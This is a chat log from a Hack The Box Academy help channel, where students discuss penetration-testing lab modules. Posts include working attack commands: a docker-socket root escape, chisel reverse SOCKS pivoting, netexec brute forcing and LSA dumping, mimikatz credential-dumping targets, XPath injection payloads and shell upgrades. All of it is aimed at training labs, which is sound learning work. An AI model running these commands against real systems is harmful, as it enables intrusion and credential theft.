#modules

but this is just straight up wrong way to use a code block, the string after ``` should denote the language

with the plugin you can get it to look like this

hmmm i will have to look into this plugin, thx

change the FILEPATH

Morning, I'm working through the Password Attacks module and am stuck on the Linux Credential Hunting where I need to find Will's password. I saw the hint about another user, but I've spent a few evenings trying to brute force FTP & SSH with the password.list the hint referenced to no avail. Any ideas what I'm doing wrong?

└──╼ $netexec winrm 10.129.42.197 -u user.list -p password.list
┌─[aesliex@parrot]─[~]
└──╼ $```

why isnt my netexec thing working

winrm probably isn't running

either way don't try to bruteforce winrm, it's slow af

the question is asking me to , " Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer."

well it says to crack the password

also what module and section

pentest path, password attacks, network services

how can i do it in another way? im kinda new lol

crackmapexec and I think I used a password list from SecLists

oh that section

crackmapexec isnt working for me, someone here told me to use netexec as its newer and better

@rocky mist

yeah you have to use winrm then, are you connected to the vpn?

yepp im connected

Bummer, that's what I used

reset the target, something should show up when you run the command

netexec is just cme but better

Attacking Common Services - Easy
what is the other way in? i used the mysql one

tried to poke at the ftp server but didnt find anything

mysql, ftp and the webserver are the only things needed

i logged to the ftp server but got Entering Extended Passive Mode (|||53455|)

when listing

i used smtp to mysql

the ftp server is also on http

which means?

have u logged on the http ftp?

sorry for the tag, can I ask how you figured out how to change the codeblock text color ? I can only change the inline text color, but not the code block text color, no matter what color I chose it stays the same

how?

the ftp server only have two files

i think they are talking about what you just said

text color as in you want syntax highlighting?

u got an idea now?

no just regular text

the expectation is to color it black, but its not

shell?

upload shell to the ftp server

and execute it over the web app

huh, not taught in the module but its a good way

like the photos above, not sure why it's not changing default codeblocks text to black, but it can change the background to light grey

now what is the rdp doing?

idek

where is the text in the codeblock

thats the point :), it's too grey to decypyer when it should be black instead

use a different theme then

or the style settings plugin should work

i just use the default, which theme are you using ?

minimal theme has many themes

yeah I use minimal

installed minimal, and no change

guess I have to troubleshoot from a default obsidian install, maybe there is something confilicting

install and activate it, then change the color scheme

yeah, what I did, installed minimal selected it, tried to change the color again

Hey

Module: Linux Privilege Escalation
Section: Docker
Link to section: https://academy.hackthebox.com/module/51/section/2411

Found this section to be a little confusing. So, the only exploit discussed in this section is the final command?

||```sh
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash

If someone could provide some additional explanation I'd appreciate it.

Im doing the exploiting we vilnerabilities thick client section there we have a creds to logon to a fatty client jar app using a creds given but i cant login even after i did as mentioned in the section

this article helped me fill in the gaps where the module did not provide enough information
https://juggernaut-sec.com/docker-breakout-lpe/

I just threw that command in chatgpt and it helped me

any body working on xSS module? I am working on the phishing exersise. I test my payload and it works but when I send it to he valdation page it says invalid URL. What is the criteria to validate the url? thank you

I don’t remember the module explaining the commands tbh

Did u send the url in the box?

I tried that, gave a little insight, but didn't quite explain the gaps in the module.

I'll give it a read, thanks.

Ur mounting the hosts / directory to the /mnt directory in the container

Pivot, Tunneling and Port Forwarding Module - SKILLS ASSESSMENT :

• Question 6: "For your next hop, list the networks and then use a common remote access solution to pivot. Send the C:\Flag.txt located on the workstation"
  Am I performing a network scan but only find IP addresses 15 and 35 that I'm performing wrong? And I imagine that I have to look for a username and password to pivot but I get lost because I can't find the password as such, I appreciate if someone helps me

Chroot changes the containers / directory to /mnt so its automatically in the hosts /

im at the windows section under "setting up" and im confused on how to set up windows vm after downloading the zip file for vmware can anyone help me out?

Dump creds

Btw I've not gone through the article yet but based on my understanding so far, I basically need to have the following requirements to be able to exploit this?

1. Current user should be part of the docker group.
2. There should be a docker image present on the machine.
3. I should have elevated privileges over a docker.sock file (I find this file(s) using the find command or with LinPEAS?)

The condition is one of the below, not both:
-you are part of the docker group
-there is a docker socket file over which you have write privilege

Then to exploit it:
-there is a image already present and you can use that for exploitation
-you transfer a container image to the target and import it into docker docker load -i ubuntu-image.tar (if there is no image)

?

Got it, thanks!

What's the privesc technique called?

hmmm, I have it my notes as "Docker Membership Priv Esc", not sure if it has a specific name

Any help i cant seem to login to the jar file using the creds given in the exploiting web vulnerability in thick client section

Did u switch the port?

Yss

Hey guys any idea why its not working?

And recompiled it?

I dont understand the error?

What module

file transfer

i uploaded the zipped file on the targed but i can't connect to it rn with rdp to unzip it and take the hash

Try restarting it

still not working

i already did a full port scan but only 22 and 80 are open

worked fine for me

hey guys, the Attacking Common Services "Attacking FTP" has no port open

anyone faced that issue?

maybe u need to switch vpn servers

keep restarting and scanning

if the machine lags when u scan, u will miss it

I did restart the Target IP many times, no use

It's just purely closed.

its there, the machine is just really laggy

Alright

mb it was a linux system not windows so rdp was not working here

it was with ssh

I'm working through the Password Attacks module and am stuck on the Linux Credential Hunting where I need to find Will's password. I saw the hint about another user, but I've spent a few evenings trying to brute force FTP & SSH with the password.list the hint referenced to no avail. Any ideas what I'm doing wrong?

try making a mutated list of the hinted password

Ahh, I was thinking of doing that, thank you!

yeah idk why they hid a core part of the question in the hint

Question on sqlmap "What's the Kimberly user's password? (Case #1) " I got the answer by dumping everything and using grep. Was there an non grep method I missed? I know we can search for specific table and column names but can we search for specific values like a user name?

Module: [Active Directory Enumeration & Attacks]
Chapter: [AD Enumeration & Attacks - Skills Assessment Part I]
Question: [Submit the contents of the flag.txt file on the Administrator desktop on MS01]
hello,
how can i make a pivot ? i tried with ligolo and chisel (bind and reverse), but it doesn't work.
Maybe I can give more explanation in DM

sqlmap has options for that like --tables, --columns, etc

in linux privilege escalation > priveleged groups, i found the flag but for some reason it's telling me its incorrect

not sure how possible it is, but can someone confirm the flag i got is the actual flag?

wym pivot, isnt ms01 the first machine u get access to?

nevermind, just got it

two identical flags but one had a special character and i thought i had to exclude it

Any nudge on the Skill assestment lab of the Windows lateral movement lab?

for some reason im mega stuck on AD skills assessment 1 Find cleartext credentials for another domain user.
I can get the NTLM hash for tp****** user using lsassy with nxc, and pth with nxc to auth as that user, but i feel like im missing something from the module. I'm starting to go down various rabbitholes but feel like im missing something extremely simple

yes, I have an initial access via a webshell on this machine, but I want to acces to the 172.16.0.0/16 with my linux machin

thats not clear text

yeah, i know. thats why im posting here.

whats wrong with ligolo or any other pivot tool?

did u run a reverse shell through the web one?

2. On the attacking system:
./chisel server --socks5 --reverse -p 8000
3. On the target system: 
.\chisel.exe client $attackerip:8000 R:socks

you should be able to communicate with MS01 after that

did u try mimikatz

Because it's technically possible to get it without the hint though it takes a while

no, I execute directly chisel in the webshell

I'll try that

yeah, but still was only really able to get an ntlm hash. im trying to go back through my notes and see what other ways of dumping cleartext creds were covered but i feel like its right in front of my face and im just ignorant

is mimikatz for sure the correct path for getting the cleartext password its looking for?

The first targets to go for for finding clear text creds after SYSTEM access

SAM Db
LSASS process memory dump
Dpapi + Browser creds
Files found on system

But to get clear text you’ll have to crack the NTLM hashes in Sam db

yeah im clearly doing something slightly wrong, ive checked lsa / dpapi with mimikatz +nxc
the NTLM isn't crackable with rockyou (and probably isnt the intended way to get the password its expecting)
i went and checked sysvol/powershell history/some program file directories because that seemed to be another place to check for cleartext creds
maybe i need to just bang my head against the box a little more

Even then it depends on which submodule you use in mimikatz

Iirc there's lsadump::sam which requires admin

There's a hacktricks page that has them listed

hey all, I am struggling with this question on the Windows Cmd Line Skills Assessment. I am able to see all the "flag.txt" files but not entirely sure has the flag in it because there are tons.

"User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them."

Well you might want to learn about recursion then

gci [get-ChildItem] in powershell

Since all but the actual flag one is empty you'll only receive output for the flag :]

If you're sure the format is HTB{..} you can pipe the output to "Select-String" (powershell's grep)

Is it possible for bloodhound to miss information about an AD environment? I guess it depends on what domain user you're running as, right?

Doesn't really depend on the user run as, as it's a bunch of ldap queries

But it can miss some stuff

@nova ginkgo let's not reveal contents of the AEN module as many do it blind, since the module itself is the walkthrough

I suggest using a larger list

I've done some poking around, but do you know why

And using filters

Fixed yet?

the ldap query for w/e reason just didn't return anything or was slow to return for whatever reason ¯_(ツ)_/¯

May I dm you about this? I do not want to spam the chat about my question lol

Sorry I'm gonna be busy soon

Given what came out of today's AMA, are there any plans to offer an "ICS Penetration Tester" role path and associated certification? After all, attacks on industrial control systems can cause far more damage than attacks on anything else, so it follows that this is where the most demand lies.

I gave you a powershell command you can look into

Not sure, doesn't look like it atm though

Also the AMA coincides with the new Alchemy prolab

yupp

New question, it don't work here any help, i cant use unzip and the gunzip is the hint i received

can you tell me first latter ?

I don't have my notes open. But you should know how to filter ffuf results at this stage

If not, then your notes suck

I filtered with -fs 15157

Is that the common size returned?

I generally just throw -ac and let ffuf decide

@gilded lion ?

Yeah, I don't know what is going on but I just get a "'Get-ChildItem' is not recognized as an internal or external command,
operable program or batch file." while in the Windows terminal

Because it's a powershell command, not CMD

There's also findstr

But findstr can be clunky (since it's built for CMD)

Anyone ^^

i just add -ac is that correc ?

Yeah it's for [a]uto [c]alibration

Yeah

Not in the near future…. We are focussing on other specialisation areas.

Well it looks like you're trying to unzip the windows zip file on a linux target my guy

Just from a base observation

the suffix is .z

but it worked an hour ago?

? Well I'm sure the file you need to extract on the linux host is not the "win_upload.zip"

Mb upload_win.zip

not working to it says unkown suffix

🤦

the file is upload_nix.zip

Second unzip should be on that host no?

unzip wasn't on the host I remember

same problem thats why i tried both ^^

no its not and i have no rights to install it

Oh just unzip it on your host and transfer

Oh the hint tills you exactly what to do with gunzip btw

But it helps to use the right file

the command worked fine for me

just copied and pasted it

^

i cant bcs the hash is not the same ^^

still not response

Use a bigger list then idk

its jsut weird bcs with scp upload everything worked fine im just trying other ways

try transferring with scp or wget @tender nimbus

I used

yeah alrdy did but im trying other things thats why i dont understand why it dont work

Why would the text hash not be the same?

??

id its not the same hash then my awnser on the question

You ran the hasher command on it yeah? Weird then if there's some difference

The zip and txt file will have different hashes ofc

@fathom pendant

i think its because you use -o instead of -O

Ow okej wait there is a problem with the file? when i download it on my host it becomes the _win and not the _nix?

I suggest if you're truly stuck at this early stage;
Read the section

Because you're clicking the wrong download link?

No its the only one on htb

but im logging out and cheking it

I clicked the link from that section and download the upload_nix.zip just fine

okej know it worked sorry that was weird

Maybe some cache error

Yeah maybe but stil cant unzip it srsly im gonna try again with scp

But in this case I would have to perform the sam dump and bring the data to my attacking machine to do the decryption?

You can do that, yes

Iirc linikatz can do lsass dumps

Been a hot minute

weird with scp it work but not if i run my own server on my machine

What I'm trying to do is move the files to my local machine to do the decryption and I do it with smbserver.py

I want to know if I need to transfer the Mimikatz tool or this is the way to use it within the Pivot Host

You can

There's multiple ways to achieve an objective

This hacking when you are learning is a headache jejejje

Learning anything is a headache, that's your brain working :p

It's hard to break out of "only one true method"

You will generally fall into a method that's the easiest or simplest to do for you

But knowing multiple tools for the same goal is helpful

I think that in order to move the files as it does not reach my attacking host then there is where I am like stuck because I don't know if I have to move them to the point of support

Pivoting is a helpful skill to know

port fowarding

^

Otherwise you transfer to your pivot host then from your pivot host to you

If I have the ideas ogranized I have to dump LSASS but I need to transfer that to my attacking machine to be able to decrypt it and be able to enter RDP from the pivot host to the other machine with the information it finds is something like this?

How does one report a typo in a module?

#1234357888114364508

figured it out, mimikatz may work for some but didn't for me. just tinkered with netexec a bit.

Just create a new post?

i beleive yes

just state the module name in the title, and tell where the typo is in the content

Thanks!

XPath - Data Exfiltration (Excercies
Why does GET /index.php?q=ave&f=full+|+//* work - prints all the data
Why GET /index.php?q=ave&f=full+|+/*/* Doesn't work - print just 3 <br>
in returning the data in XML doc

I think the question is more about the regex for f= (the GET is just before in his message, I assume he messed the code quote)

hi

i'm struggling with Firewall and IDS/IPS Evasion - Hard Lab in NMAP. can't find the flag requested

You will need to ask a more specific issue to get an answer (haven't done this module yet so it won't be me, but many helpful people around will nudge you in the right direction if you describe your struggle)

"Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer."

also why I can't send the screen

Not what HaTxx meant. Provide more details on what you've tried without posting spoilers

Network Enumeration with Nmap Module. I tried different nmap scan to find the version of services but can't find any flag that they are requesting

full+|+//* This query will select all elements at all levels
full+|+/*/* This query will select all elements that are children of the root's children.

So in this case it will not return the deeper elements like <fullstreetname>, <streetname>, or <street_type>, because those are nested further inside <street>, which is beyond the two-level depth that full+|+/*/* is targeting.

I mean I found port 22 and 80 and the relative version of services running on it. BUT any answer submitted results incorect

I've not done the module, so here is a question: What service the client was talking about?

thanks for clarifying 🙂

See #welcome and follow the instructions

No worries, I don't understand what the question is about yet, but I know typos when I see them 🤣

Turns out I actually did that module, I got confused with the IDS Evasion part.
All you need to solve that lab is in the page before all three labs.
Literally go through the page one by one and see if that leads somewhere.

Appreciate the help

I am currently working on Footprinting > IMAP/POP3. I am currently trying to figure out the admin email address. I have tried:

1. ||sudo nmap <target> -sV -p110,143,993,995 -sC||
2. ||openssl s_client -connect <target>:imaps||
   2a. ||Running commands inside of the connection||

However, the only email address I have been able to find is ||cto.dev@dev.inlanefreight.htb|| (which is not correct)

Are you sure? I tried but nothing

Hi
I am currently working on the Linux Fundamentals. At a moment I need to count how many services are listening on the target system on all interfaces (not on localhost and IPV4 only)
Spoil on answer be careful if you are working on that
||I wanted to use netstat as teached and was getting 10 as an answer but it was wrong. When I checked some forums they told me to use ss instead of netstat.||
||Could someone explain to me why ss which is supposed to replace netstat is not getting the same answer?||
||For reference this is was I used : ss -l -4 | grep -v "127.0.0" | grep "LISTEN" | wc -l instead of netstat -l -4 | grep -v "127.0.0" | grep "LISTEN" | wc -l||

There are probably more ports open than 22 and 80.

Here's a pretty good resource:
https://www.atmail.com/blog/imap-commands/

Yeah, I have read this a few times, but have not been able to replicate anything useful. Is there a specific section that may be of use? All of the commands which they recommend, turn out to not be accessible on the connection

You can DM what you have tried.

basically everything what they suggest

don't think so. I spent the last 4 days to read&try again and again but NOTHING

Like someone said earlier, everything you need is in that final section.

is there anyone who finish this module Stack-Based Buffer Overflows on Linux x86 ?

yes I just realised that you need to ncat that stuped thing

Thank you!

In Misc CSRF Exploitation, I’m struggling to get this one working.

1. gobuster does not find any subdomains as mentioned
2. the app stays on the profile only a few seconds then logs out. By the time I deliver the payload the app has logged out.

frankly i just used netcat to navigate the imap/pop3 server in that module

for the username enumeration i think nmap has a script to try all the different methods

i'm doing the attack common service - easy lab i found both the user and its password but can't connect to mysql i get this error ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

there is an interesting command flag there try that

if that can get you through with that.

within mysql command ?

right

hero

worked?

yup i had to google it and find the flag needed to use s***-***

but yes good work

you should have greped it

found many command about it so i had to google the error to find about it

hi guys im new here
im a student and interested in learning cyber security can yall help

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@wheat meadow use this ☝️

Hi, a new student here

starting at the beginning with cracking into HTB curl inlanefreight.com is failing, do i need to be connected to the VPN for it to work or is that just a completely made up website name?

that's a real website you can visit

weird guess i had a type when i tried XD

hi I'm stuck on the Attacking SAM section of the Password Attacks Module. I'm specifically stuck on the 3rd question. I'm gonna try again tomorrow but would it be a bad idea to look at a walkthrough of it up until the third question? Would it be possible for me to get a hint tomorrow if I'm still stuck? I don't want to be stuck on this one section for several weeks. I still want to get it obviously.

What do you recommend because I still want to learn?

you should just post where you're stuck at

Ok. I will try again tomorrow because I think I'm missing some stuff but tomorrow I will try the whole thing again and post where I am stuck at.

When it gets to that point

its mainly on the third question if you look at the last major thing the section teaches

The Remote Dumping and LSA Secrets Considerations part

I do it but it won't get me the result I want

I kind of played with it a lot

ok but the question itself tells us nothing about where YOU are stuck

you haven't said what you've tried, where you can't get past, etc

so like i said before.. just say what you're stuck on

ok I need to do it again to tell you so tomorrow morning I'm gonna do it again and then tell you where I'm stuck

on the pivoting module I am trying to do the RDP Socks Tunneling with socksverRDP section with chisel instead. I have a chisel client and server set up and connected. But I cannot for life of me get an rdp session from my attacker box. Have proxychains set up to use the proper local port. Any suggestions?

for all we know you're trying to dump SAM by going to the bathroom

yes

that's exactly right

no but seriously, I think I want to try again when I'm focused and can make a good attempt and give you a good in depth report of everything I've tried

and why I'm stuck as well, because I think that it would take actual focus to explain

On my attack box i set up chisel by "./chisel_1.7.6_linux_amd64 client -v 10.129.6.89:1234 socks " on the windows pivot box I have ".\chisel_1.10.0_windows_amd64 server -v -p 1234 --socks5" but when i use "roxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123" from my attack box it doesn't connect

i just read the question.. it's literally the command it gives you to dump lsa..

yes I know but that command isn't working in my case

I try the exact command and I don't get results or I'm not accessing the results properly

alright well come back with more info then because 'not working' doesn't tell us anything

for example, maybe it's not working becasue your keyboard isn't plugged in

we have no starting point to know where you're at by just telling us 'i need help'

Ok. I will try tonight possibly if not I'll go through the whole thing again tomorrow

actually I'm gonna try to get it over with right now so I can show you

looks like you're using two different versions of chisel? use the same version for both server and client maybe

that way I can show you what's going on

one is running on windows and the other is running on linux

yes but the files names indicate they are two different versions of chisel. i'm saying use the binary from the same release.

i gotcha. True. I'll give it a shot

now its not letting me RDP into it. I have RDPd into it in the past:

┌─[us-academy-1]─[10.10.14.27]─[htb-ac-605555@htb-a5lessvu94]─[~]
└──╼ [★]$ sudo xfreerdp /v:10.129.202.137 /u:htb-student /p:HTB_@cademy_stdnt!
Authorization required, but no authorization protocol specified

[20:46:06:642] [9015:9015] [ERROR][com.freerdp.client.x11] - failed to open display: :1
[20:46:06:643] [9015:9015] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.

Is it just me or is the linux fundamentals module not beginner friendly?

so should I just reset target or Pwnbox?

You get asked questions that aren’t covered in the stuff you are taught

you probably need to wrap the password in single quotes because of the special characters, specifically the exclamation mark.

┌─[us-academy-1]─[10.10.14.27]─[htb-ac-605555@htb-a5lessvu94]─[~]
└──╼ [★]$ sudo xfreerdp /v:10.129.26.27 /u:Bob /p:'HTB_@cademy_stdnt!'
Authorization required, but no authorization protocol specified

[20:49:00:081] [13531:13531] [ERROR][com.freerdp.client.x11] - failed to open display: :1
[20:49:00:081] [13531:13531] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.

still won't work even after I reset target

what module/section

rdp and socks tunneling with socksoverrdp?

this is for the Attacking SAM section of Password Attacks Module

you don't need sudo for xfreerdp btw

Why are you trying to rdp with elevated rights?

because with regular xfreerdp it gave me a similar error

hold on let me try something

got it working the rdp

now I'm gonna try the next step

i ran the command they showed in the module and was able to do it np

so I ran the command

and here's what showed up

┌─[us-academy-1]─[10.10.14.27]─[htb-ac-605555@htb-wuloikg0dj]─[~/Documents]
└──╼ [★]$ crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa
[*] First time use detected
[*] Creating home directory structure
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
[*] Creating default workspace
[*] Initializing MSSQL protocol database
[*] Initializing WINRM protocol database
[*] Initializing LDAP protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing VNC protocol database
[*] Initializing WMI protocol database
[*] Initializing FTP protocol database
[*] Initializing RDP protocol database
[*] Copying default configuration file

So it might have worked but then where do I get cracked username and password?

see my issue? same thing for the other variation on the command

that's what I'm having issues with

that's the main thing

quotes being wrapped around special characters is a linux thing, not just a xfreerdp thing.

ok

you need to do it every single time you're trying to input a literal string.

ok

but then it shows this:

┌─[us-academy-1]─[10.10.14.27]─[htb-ac-605555@htb-wuloikg0dj]─[~/Documents]
└──╼ [★]$ crackmapexec smb 10.129.42.198 --local-auth -u 'bob' -p 'HTB_@cademy_stdnt!' --lsa

and nothing after that

where is the data stored then?

so going through the module curl https://inlanefreight.com should print out some sort of error, but when i run it nothing prints out. i dont have the -s flag and confirmed curl http works

it should display on your screen, and cme stores data in the .cme folder

its not displaying it on my screen

even when I do it in single quotes and capitalize Bob

like first letter of Bob

try https://www.inlanefreight.com instead of just inlanefreight.com

the only time i've seen CME not return results is when it can't connect to the target, from what i recall

you can also try nxc, which is the successor to cme

well now that returned actual html with no warning

wait I changed target IP which I did earlier but it may have worked this time hold on a sec

so it worked then

@htb[/htb]$ curl https://inlanefreight.com

curl: (60) SSL certificate problem: Invalid certificate chain
More details here: https://curl.haxx.se/docs/sslcerts.html
...SNIP...

but the example is should i should get this

you can't just copy and paste from the module directly, you need to use the target IP given to you

well it worked but i dont think it was supposed to?

I know

what section is this in

Web Requests - Hypertext Transfer Protocol Secure (HTTPS)

part of the Cracking into HTB

I got flag

ez

minor thing I was not figuring out ya

I believe that is just an example and it doesn't reflect the actual server, because the actual server doesn't have an invalid cert

is there any way to find a https:// web page that has an invalid cert?

no, but you can search for other websites. like https://expired.badssl.com/

yeha i tried googling but just got a bunch of articles on what it means xd but okay cool

i just gave you one

jaja i misunderstood what you were saying xd

ty

Have anyone done the blind sql injection module?😅

Plenty of people have, just all your question

I have been stuck at time based data extraction section, the Python script I don’t understand why when I get the result and submit it the flag isnot true whether I set delaytime is 1,2,3,4 s. Can anyone give me hints, I guess the problem at the oracle function.

Try to run it from a pwnbox

#modules message

Oh wait that’s the blind sql injection module. Didn’t have this issue there tbh

If it's a timed attack you might want to try to run it a couple of times, see if there are any different outcomes. Also make sure you don't have any trailing white space.

I have tried running it many times in the last 3 days and it always flags the send as wrong. I wonder if there is something wrong with the script?

Flags as in different flags each time?

Yes.

Exactly what I said then, run it multiple times, and figure out the common parts of the string.

weird

You also might have better luck from the pwnbox as I'd expect it might have a more stable connection to the spawned instance.

maybe using a longer timeouts will help

I see the longest time is 4s, I if set the delay time is greater 4s, By the time the lab ended, I still hadn't gotten the flag.

You can add time to your lab

ah, I see, thank you.

Feel free to dm me your code and I’ll have a look

Yeah, I sent you my code, Please check it.

@limber river I set the delay time is 5s, I will see how is the result.

good luck

I got flag thank you so much everyone

you should remove those creds from your post its revealing info from the skill assessment you dont need to reveal

👍

I am doing Windows Priv esc module at SeTakeOwnershipPrivilege lesson. In the lab my whoami /priv does not even have SeTakeOwnershipPrivilege. How am i suppose to do this lab?

Remove this

and have you really checked for what you actually got the credentials for?

or you just saw the credentials and applied it?

altho same creds are going to get used twice.

can anyone help me with this? still cant figure it out. i've reverted a few times but htb-student still has no SeTakeOwnershipPriv, i cant edit GPO too.

https://academy.hackthebox.com/module/67/section/631 SeDebugPrivilege What am I doing wrong?

the script updated, try looking at the source. PS> ImpersonateFromParentPid -ppid <parentpid> -command <command to execute> -cmdargs <command arguments>

Lets goo

where can i ask help on networking? im new guys

Yes, I coped with the last one, a new problem appeared.

hi guys

im new here

0x00000002

ERROR_FILE_NOT_FOUND

The system cannot find the file specified.

statically compile it or grab one from the repo release page

run as admin

Hi guys for the footprints medium lab I keep getting permission denied, any reason why

Please give more information, like what have you tried, show the commands etc, more information you provide the more people can help

I can't attach images for some reason

showmount -e 10.129.135.131
Export list for 10.129.135.131:
/TechSupport (everyone)

mkdir target-NFS

sudo mount -t nfs 10.129.135.131:/TechSupport/ ./target-NFS/ -o nolock

cd target-NFS/
bash: cd: target-NFS/: Permission denied

moutning is done with sudo

but which user are you changing dir as

Htb-ac

When mounting I have sudo

yes

Thank you, I switched to root user and it worked, crazy how I didn't think of that before

issue must be related to latest build vs old build of chisel

i see you got the answer already

https://academy.hackthebox.com/module/67/section/642 Why don't I have access

thanks!

run as admin

i run

run cmd as admin

hey, I'm in the password attack trying to do the Network Services to get the flag from the user victim but the dir command doesn't work

I can't upload an image for the problem

So you've identified the flag?

im in the user victim machine now

after I get the user name and the password i do "evil-winrm -i <target-IP> -u <username> -p <password>"

And it is an excellent aspect that I can't write anything

warning: remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

this is the problem

that's just a warning, won't affect you sending commands

yes but the command line dont work

why not? just type something and send it

First of all, thank you for helping me, but it is important to note that the problems I encounter will always be strange

if you see that warning that means you're connected to the winrm shell

That's right, I logged in, and then I have to go into the file to remove the flag, the problem is that the commands don't work

if you wanna send images, read #welcome and get verified

Can you send me a screenshot via DM

ok

maybe because there's no files in that dir?

have you tried other commands

yes

nothing works

Most of the time the flags are elsewhere.

Just look around but don't over think it.

I tried to go to john folder its dont do nothing

are you doing the security fundamentals p[ath? i think you should be starting there. and start from the beginning

Also images that have spoiler information, i.e., the answer shouldn't be shared, which is why I said to DM a screenshot.

I did,

run whoami

what do you see

you seem to be unable to do basic file system traversal and are missing a key understanding of file system hierarchy and such, tho? what would lead you to believe the flag would be in one dir, then when you dont find it, not know to look elsewhere? i think you should start over. unless this is a troll.

I'm new here, for next time, how can I send DM?

You can just click on my username in this chat and type the message there. I will then have to accept it. Be sure not to DM without permission. I have already said you can.

I appreciate your response, but I have no problem with Linux commands, the purpose of the picture I sent was to show that the most basic command does not return a response, in the same vein, I tried many more attempts,

But like exciton said, if you don't understand how to move around a file system, it is recommended to get those basics down first.

ok

look we're here to help but you need to get real about where you're at with your approach. very fundamental skills missing.

It did produce a response.

can you link us to the module? i think i know the one you're doing.

https://academy.hackthebox.com/module/147/section/1327#questionsDiv

I am running through that section for funsies and it works. The flag is where it would normally be.

you did "dir"?

ok i dont have access to that one. best of luck, you'll get it sorted. normal location should be something to note when you do find it. also since you're in powershell consider using the Get-ChildItem cmdlet to search for a flag.txt or whatever the lab tells you its called to search the system to find it.

make note of where "normal" locations are so you can just keep that in the back of y our head for later labs

Eh, there are a few ways of displaying the flag, but yeah I changed directories to where the flag was and used dir to identify it's existence.

@scarlet tundra man Get-ChildItem or check the msdocs page, look for the examples that searches the entire filesystem, it seems like you're close.

Do most of yall pair a module or concept with a box? Ive been ignoring this in an attempt to force feed myself info as fast as possible... answering questions though (sometimes) helps to reinforce the info... or atleast makes me think i know what im talking about

@gray yacht ^

and anyone else currently active for that matter.

wondering about ways to solidify the info and not have it forgotten as soon as the next module is begun, but balance that against a continuing effort to learn/retain info (i need this stuff learned, quickly)

practice does help but the assessments in modules are sufficient for the most part

oh thats a good point, i should prob return to them and redo after a few days/week just to double check

ok so im doing session attack assesment, this is kinda a trivial assesment but im being lazy does anyone know if i HAVE to run a fuzz to enum valid emails first.last@example.com or is there a "better" approach? (easier)

https://academy.hackthebox.com/module/153/section/1458

I honestly use the same methodology to process each one, which really drives home my process. So instead of just jumping to something that I know is where I need to be, I still run nmap and search for directories, etc.

I did it, thanks

Good job!

what is the intended for Attacking Common Services - Medium?

Hey im in the exploiting web vulnerabilitiws in thick clietn part i try to download a fatty servwr jar file into system at a point in the exervixe but i get this error

Any help

i cant be able to upgrade to fully intractive shell anyone?

python3 -c 'import pty; pty.spawn("/bin/bash")'

Ctrl + z

stty raw -echo

fg

reset

did but didnt worked

didnt enter reset letme try

terminal type?

xterm-256color probably

naah didnt worked

depends on ur terminal but if you are not into weird ricing / distros its xterm-256color

bruh

that is next level script kidding

xterm-256color

indeed it is ! i am learning not a pro

oh shit now i get it i copied that word "probably too"

yeah xd

i have been working for hours and maybe i need a break for now

i fffffff up my mind

it happens xd

I don't have my notes this second for that, but I don't recall having to do that.

I've re-wrote this message 3 times now 😄

Yeah those were the things I was going to suggest.

for now i think the intended way is to use rustscan

I wouldn't, it misses ports left and right. Also would you mind removing your replies as they are a bit spoiler ish

yeah sure

same issue here, were you able to solve it?

https://academy.hackthebox.com/module/67/section/603 Should I have done it in another way or did I do something wrong?

If you changed permissions you'll need to log out and back in

do you mean disconnect? or shutdown /l in console?

No, logoff or shutdown /l

Through the console works thank you.

Despite the fact that I have been using Windos console commands for a very long time, unlike Linux, I do not know, you need to learn 😦

Instead of pinging someone from two months ago it would be better to just ask your question.

Hi everyone,
a few months ago I completed the SSRF section of the server-side attacks module and really enjoyed the content and labs. I would like to go back to refresh those techniques, especially the use cases in SSRF Exploitation Example and Blind SSRF, however the module has been completely updated. Therefore I would like to ask, is there a possibility to access the old contents of the module?

Sadly no, but you can leave feedback with /feedback in discord.

thanks man

Hello I waited about 1 hour spawning but still spawning why ?

Attacking Common Applications : PRTG Network Monitor

Try a different VPN server

Hello, I am stuck on the skills assessment for Understanding Log Sources & Investigating with Splunk " find through SPL searches against all data the process that started the infection. Answer format: _.exe". I found the answer already to the previous question that asks for the "the process that created remote threads in rundll32.exe." Steps taken so far: used the previous executable identified and pulled the destination IP and Source IP preivously identified, created a Table with the messages field and went through all the executables. No luck there. Tried filtering for the previous day and first day the previous executable was found and used "exe" to try and identify any suspicious exe events in that time period. Also tried a query involving EventID=1 | table _time ComputerName ParentImage ParentCommandLine ParentProcessId Image CommandLine ProcessId to try and identify process creations with no luck. Currently stumped, does anyone have any hints/advice they can give to put me on the right track?

Help me pls

Attack the PRTG target and gain remote code execution. Submit the contents of the flag.txt file on the administrator Desktop.

Attacking Common Applications : PRTG Network Monitor

I did what I learned but

─(forever㉿kali)-[~]
└─$ sudo crackmapexec smb 10.129.x.x -u prtgadm1 -p 'Pwn3d_by_PRTG!'
SMB 10.129.216.158 445 APP03 [*] Windows 10 / Server 2019 Build 17763 x64 (name:APP03) (domain:APP03) (signing:False) (SMBv1:False)
SMB 10.129.216.158 445 APP03 [-] APP03\prtgadm1:Pwn3d_by_PRTG! STATUS_LOGON_FAILURE

@fathom pendant

Active Directory Penetration Tester Path > Using CrackMapExec > LDAP and RDP Enumeration > Question 3
https://academy.hackthebox.com/module/84/section/811

I'm entering the correct answer but it's not accepted as correct.

sounds like it's not correct then. i just checked, it's not correct.

Ohai SuperNuts

hello

pls guys

It is correct....

no it's not

I checked the walkthrough

Did you look at my screenshot?

did you enumerate yourself?

Yes

look at the samaccountname then, that's what it's looking for

there's a big difference between a user account and a computer account

Copy that

Is there a way to gift a learning path to someone or only gift cards?

Cube gift cards*

never mind

no, because that's illegal

i think it's obvious you want to do something malicious so we aren't going to help you

He’s gone

great now he's going to hack you instead

